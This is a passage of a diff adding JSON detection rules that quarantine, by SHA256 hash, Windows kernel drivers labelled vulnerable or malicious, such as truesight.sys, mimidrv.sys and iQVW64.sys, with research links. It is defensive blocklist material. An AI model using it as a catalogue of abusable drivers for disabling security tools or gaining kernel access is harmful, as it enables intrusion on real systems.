+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499511Z",
+ "creation_date": "2026-03-23T11:45:31.499514Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499523Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "544347a5b7c60b9a501f02b06e51a3c0bc7664b1fe19e85195aa4f0c79d852a9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "faccc13c-b498-578e-8a69-622adab7e1bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978032Z",
+ "creation_date": "2026-03-23T11:45:29.978034Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978039Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff",
+ "comment": "Vulnerable Kernel Driver (aka bw.sys) [https://www.loldrivers.io/drivers/578d4909-c2ba-4363-b6e3-98fb62d5e55c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fad2a4e0-97c0-5144-9722-951def34f0e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479740Z",
+ "creation_date": "2026-03-23T11:45:30.479742Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479747Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e5cdf9d41843ecf7f9e252b706a0c5ca89ce288a4944ee70dd43fcc06965a8f",
+ "comment": "Malicious Kernel Driver (aka a9df5964635ef8bd567ae487c3d214c4.sys) [https://www.loldrivers.io/drivers/ac62e709-4aa5-41f4-87b1-b811283d70d1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fad432ed-ceec-502d-8842-59b2284a4619",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157639Z",
+ "creation_date": "2026-03-23T11:45:31.157641Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157649Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b984209f1d5d681a3bbc876ddb90fd5905155cd0ec5449803e5debd9d066e11",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fad5e050-ef9d-560a-8ef2-fac9adc40a31",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606157Z",
+ "creation_date": "2026-03-23T11:45:29.606158Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606164Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a48f92a9c2d95a72e18055cac28c1e7e6cad5f47aa735cbea5c3b82813ccfaf",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fadaa988-2483-5eec-a37b-006823421bb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160030Z",
+ "creation_date": "2026-03-23T11:45:31.160032Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160037Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4909d7e50d71ea4cd72b68a9d9c1a12a96cf1f9d6ff04272e5403ff58cdd31bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fadbc017-3cec-5f06-91fa-6af3c4f43f2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150233Z",
+ "creation_date": "2026-03-23T11:45:31.150235Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150241Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c3ba841467677571942294277c9f922fb79c5de289e7cefda14767e1cb4fd46",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "faf7a12e-4b82-56dc-aa07-7fc9175ba00e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153284Z",
+ "creation_date": "2026-03-23T11:45:31.153287Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153294Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcbfdf5bb3562ab624d954fc95007ca2baa9e6f217ebd7ee2dcc1591a949e211",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fafe9b15-ae6a-52fe-b9f8-1adf16e6d85d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811542Z",
+ "creation_date": "2026-03-23T11:45:31.811544Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811550Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec936428caafb5e535b9d0cacce885185e314c659746c19dbee4edbd21aeb513",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb09e78f-4c0a-57ab-aba2-8e81cb33bf19",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159158Z",
+ "creation_date": "2026-03-23T11:45:31.159160Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159165Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1021ecbde5a241cb33013cfe9c345f964547a03e79d19b53490e5d33169ea8c6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb21dc1e-0723-5a94-8ddf-72edd3f5d68a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826438Z",
+ "creation_date": "2026-03-23T11:45:31.826440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826445Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "55c0a887f87469e26616fe0641d83c971a3024181bd0e53a4250afae53be1a63",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb27bc42-e488-5f01-995f-79e61d6f6802",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621409Z",
+ "creation_date": "2026-03-23T11:45:29.621411Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621417Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26453afb1f808f64bec87a2532a9361b696c0ed501d6b973a1f1b5ae152a4d40",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb31c830-53bf-54d2-8fd6-825779e21050",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468692Z",
+ "creation_date": "2026-03-23T11:45:30.468695Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468704Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "869f22f072f71abc741cf9d3b9cbc9020a2611286670c6e6d67cd240629518f6",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb3749f5-6e21-5cca-8532-836149bdf73f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495984Z",
+ "creation_date": "2026-03-23T11:45:31.495987Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee3a1b13c31103c100ada53e267d1fa27a0573aa54919d29249b66fd9507a9b6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb3d6cd5-b776-5f54-bf11-f21218709141",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968203Z",
+ "creation_date": "2026-03-23T11:45:29.968205Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968210Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "810513b3f4c8d29afb46f71816350088caacf46f1be361af55b26f3fee4662c3",
+ "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb47e5b1-d5e2-5741-9d14-fecf7dfaa15d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620159Z",
+ "creation_date": "2026-03-23T11:45:29.620161Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620166Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29e0062a017a93b2f2f5207a608a96df4d554c5de976bd0276c2590a03bd3e94",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb4aa9a3-9491-5088-93a0-7542d0bb2ad4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971926Z",
+ "creation_date": "2026-03-23T11:45:29.971927Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f6ef002bf7603672cf350831065aa3664f930e9587ae8fd3bfc93ca3f21a707",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb52a350-3a84-58c0-821f-7defafc2ccca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619106Z",
+ "creation_date": "2026-03-23T11:45:29.619108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619113Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46cb4aabe49917be885f2c42ade92aceda6b9d0b7739cf0e7c3c6d93820b67c3",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb5481e1-78a0-507e-905f-01aea27dbabe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974909Z",
+ "creation_date": "2026-03-23T11:45:29.974911Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974916Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab3e5217c5ec836a882d68a23b017de5b4f88328510e4bcb9564759926aec89f",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb5a53bd-d5a1-572a-a4a0-8b9b1ad5eac5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143242Z",
+ "creation_date": "2026-03-23T11:45:32.143244Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143250Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cb497abc44aad09a38160d6a071db499e05ff5871802ccc45d565d242026ee7",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb640e01-dff7-5a80-a110-79e5cdbf1264",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815804Z",
+ "creation_date": "2026-03-23T11:45:30.815806Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815811Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81fbc9d02ef9e05602ea9c0804d423043d0ea5a06393c7ece3be03459f76a41d",
+ "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb66461a-5ba5-5954-833a-988883514cb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983491Z",
+ "creation_date": "2026-03-23T11:45:29.983493Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983498Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fb74d5c1-f83a-5d3d-b7b1-0cf3fb02149d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616398Z",
+ "creation_date": "2026-03-23T11:45:29.616400Z",
+ "enabled": true,
+ "block_on_agent": true,
